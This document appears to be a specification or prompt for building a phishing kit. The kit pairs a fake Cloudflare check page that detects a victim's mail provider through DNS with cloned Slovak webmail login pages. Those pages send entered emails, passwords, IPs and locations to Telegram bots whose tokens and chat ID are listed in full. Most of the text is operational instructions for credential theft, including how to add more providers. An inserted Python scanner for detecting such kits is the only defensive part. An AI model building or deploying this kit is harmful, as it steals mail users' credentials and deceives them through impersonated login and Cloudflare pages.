================================================================================
WEBMAIL CREDENTIAL HARVESTER — PROJECT PROMPT
================================================================================
PROJECT STRUCTURE:
router.html → Entry point. DNS detection + routing logic.
index1.html → Websupport webmail clone (mail.websupport.sk)
index2.html → Webglobe / Roundcube webmail clone (webmail.webglobe.sk)
index3.html → Generic Roundcube fallback clone (mail.rsnet.sk)
--------------------------------------------------------------------------------
HOW IT WORKS — OVERVIEW
--------------------------------------------------------------------------------
1. Victim receives a link:
   https://yoursite.com/router.html?email=victim@theirdomain.com
2. router.html reads the email, extracts the domain, and runs DNS lookups
   to detect which webmail provider the domain uses.
3. Based on DNS results, the victim is silently redirected to the matching
   clone page with the email pre-filled in the login field.
4. Victim enters their password and clicks Login.
5. Credentials (email + password + IP + location) are sent to Telegram.
   The page does NOT redirect — victim stays on the fake login page.
--------------------------------------------------------------------------------
ROUTER PAGE — router.html
--------------------------------------------------------------------------------
DISPLAY STATES:
  a) Valid email + DNS running:
     → Show a Cloudflare "Just a moment..." page with:
       - Cloudflare logo (orange cloud SVG + wordmark)
       - Animated spinner (Cloudflare orange)
       - Animated progress bar
       - Live status text: "Performing security check for domain.com…"
  b) Missing ?email= param OR invalid email format:
     → Show a convincing Cloudflare error page with:
       - Cloudflare logo
       - "400 Bad Request" in large orange text
       - Fake Cloudflare error codes (1010, 1012)
       - Real Ray ID (randomly generated 16-char hex)
       - Visitor's real IP (fetched from https://api.ipify.org?format=json)
  c) DNS API unreachable:
     → Same Cloudflare error style with error code 1016 — Origin DNS error
ROUTING LOGIC:
  - Extract domain from email (part after @)
  - Run these DNS lookups IN PARALLEL via Google DNS-over-HTTPS API:
      https://dns.google/resolve?name=DOMAIN&type=TYPE
      Types: MX, A, TXT, CNAME, NS
  - Read BOTH "Answer" and "Authority" sections from each response
  - Join all records into one string and check for keywords:
      Contains "websupport.sk" or "websupport"
        → redirect to index1.html?email=victim@domain.com
      Contains "webglobe", "webglobe.sk", or "mx-hub.sk"
        → redirect to index2.html?email=victim@domain.com
      Anything else (unknown provider)
        → redirect to index3.html?email=victim@domain.com
Technical: pure HTML/CSS/JS, fetch() API, async/await, no frameworks.
--------------------------------------------------------------------------------
TEMPLATE PAGES — index1.html / index2.html / index3.html
--------------------------------------------------------------------------------
ALL THREE PAGES MUST:
  1. Block all form redirects:
     - Remove form action attribute OR set onsubmit="return false;"
     - Add submit event listener with capture:true + e.preventDefault()
       + e.stopImmediatePropagation()
     - Add click listener on submit button with same blocking
  2. Auto-fill email from ?email= URL param:
     index1.html (Vue app):
       - Use native HTMLInputElement value setter to trigger Vue reactivity
       - Dispatch "input" and "change" events
       - Retry at 800ms, 2000ms, 3500ms (Vue renders async)
     index2.html / index3.html (standard HTML):
       - Set el.value directly
       - Dispatch "input" and "change" events
       - Retry at 500ms
  3. On submit, send credentials to Telegram via XHR POST:
       URL: https://api.telegram.org/bot{BOT_TOKEN}/sendMessage
       Params: chat_id, text (HTML), parse_mode=HTML
     index1.html message format:
       Websupport Webmail
       Email: victim@domain.com
       Password: entered_password
     index2.html message format:
       Webglobe Webmail
       Username: victim@domain.com
       Password: entered_password
     index3.html message format (already built-in, also includes):
       IP address (fetched from https://ipapi.co/json/)
       Location (city + country)
       Login attempt count (stored in localStorage)
       Timestamp
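The routing traits (client-side DoH lookups, index?.html?email= redirects) and the exfiltration traits (submit blocked, Telegram sendMessage with an embedded bot token, visitor IP lookup) listed above are also the kit's fingerprint. As an added detection example, not part of the kit, this Python scanner flags a hosted page that matches them and extracts the bot token and chat_id as IoCs for blocking and takedown; the indicator list, weights, thresholds and the sample fragments are this example's own assumptions.

```python
"""Static indicator scan for pages built like the kit described above.
Indicator list, weights, thresholds and sample pages are this example's
own assumptions, not part of the kit."""
import re

# (name, pattern, weight): patterns follow the page's description of
# router.html and the index pages; weights are assumed, tune for your corpus.
INDICATORS = [
    ("telegram_bot_exfil", re.compile(r"api\.telegram\.org/bot\d+:[\w-]+/sendMessage"), 5),
    ("client_side_doh", re.compile(r"dns\.google/resolve\?name="), 2),
    ("email_param_routing", re.compile(r"index\d+\.html\?email="), 2),
    ("submit_blocked", re.compile(r"""onsubmit\s*=\s*["']return false;?["']"""), 2),
    ("visitor_ip_lookup", re.compile(r"ipapi\.co/json|api\.ipify\.org"), 1),
    ("fake_ray_id", re.compile(r"Ray ID", re.I), 1),
]
TOKEN_RE = re.compile(r"/bot(\d+:[\w-]+)/sendMessage")   # bot token as an IoC
CHAT_RE = re.compile(r"chat_id\W{0,3}(\d{5,})")          # chat_id=... or "chat_id": ...

def scan_page(html: str) -> dict:
    """Return indicator hits, score, extracted IoCs and a verdict for one page."""
    hits = [name for name, rx, _ in INDICATORS if rx.search(html)]
    score = sum(w for name, _, w in INDICATORS if name in hits)
    verdict = "kit" if score >= 5 else "suspicious" if score >= 3 else "clean"
    return {
        "score": score, "hits": hits, "verdict": verdict,
        "bot_tokens": sorted(set(TOKEN_RE.findall(html))),
        "chat_ids": sorted(set(CHAT_RE.findall(html))),
    }

# Constructed fragments mirroring the page's description (not working pages;
# the token and chat_id below are placeholders, not real values).
ROUTER_SAMPLE = """<title>Just a moment...</title><p>Ray ID: 0123456789abcdef</p>
<script>fetch('https://dns.google/resolve?name=' + domain + '&type=MX');
location.href = 'index1.html?email=' + encodedEmail;</script>"""
TEMPLATE_SAMPLE = """<form onsubmit="return false;"><input name="_user"></form>
<script>var u = 'https://api.telegram.org/bot0000000000:PLACEHOLDER_TOKEN_NOT_REAL/sendMessage';
var d = 'chat_id=1111111111&parse_mode=HTML';fetch('https://ipapi.co/json/');</script>"""
CLEAN_SAMPLE = '<form action="/login" method="post"><input name="user"></form>'

if __name__ == "__main__":
    for label, page in [("router", ROUTER_SAMPLE), ("template", TEMPLATE_SAMPLE), ("clean", CLEAN_SAMPLE)]:
        print(label, scan_page(page))
```

Run it over every HTML file on a suspected host; a "kit" verdict plus an extracted token gives you both the takedown evidence and the IoC to search for across other hosts.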
--------------------------------------------------------------------------------
KNOWN DNS PATTERNS
--------------------------------------------------------------------------------
WEBSUPPORT (index1.html):
  MX records → mailin1.websupport.sk / mailin2.websupport.sk
  Keywords   → "websupport", "websupport.sk"
WEBGLOBE (index2.html):
  MX records → mailin.mx-hub.sk
  NS records → ns1.webglobe.sk / ns2.webglobe.sk
  Keywords   → "webglobe", "webglobe.sk", "mx-hub.sk"
FALLBACK (index3.html):
  Any domain that doesn't match the above two providers.
--------------------------------------------------------------------------------
TELEGRAM CREDENTIALS
--------------------------------------------------------------------------------
index1.html + index2.html:
  BOT_TOKEN = 8377557460:AAEc-cfMb6j5Pn4HF_7pdIGhbpVdrL7Psf0
  CHAT_ID   = 6592485465
index3.html:
  BOT_TOKEN = 8232059243:AAGc-hGRC6gFv19OhqBrBDCzU7-YwgfvyKI
  CHAT_ID   = 6592485465
--------------------------------------------------------------------------------
ADDING MORE PROVIDERS
--------------------------------------------------------------------------------
1. Create a new clone page: index4.html
   - Remove form action
   - Add email pre-fill script
   - Add Telegram capture script
2. In router.html detectProvider() function, add:
     if (joined.includes('newprovider-keyword')) return 'newprovider';
3. In the routing block, add:
     } else if (provider === 'newprovider') {
       window.location.href = `index4.html?email=${encodedEmail}`;
     }
--------------------------------------------------------------------------------
TESTING DNS DETECTION (browser console)
--------------------------------------------------------------------------------
fetch('https://dns.google/resolve?name=DOMAIN&type=MX',
      {headers:{Accept:'application/dns-json'}})
  .then(r => r.json())
  .then(d => console.log(d.Answer))
================================================================================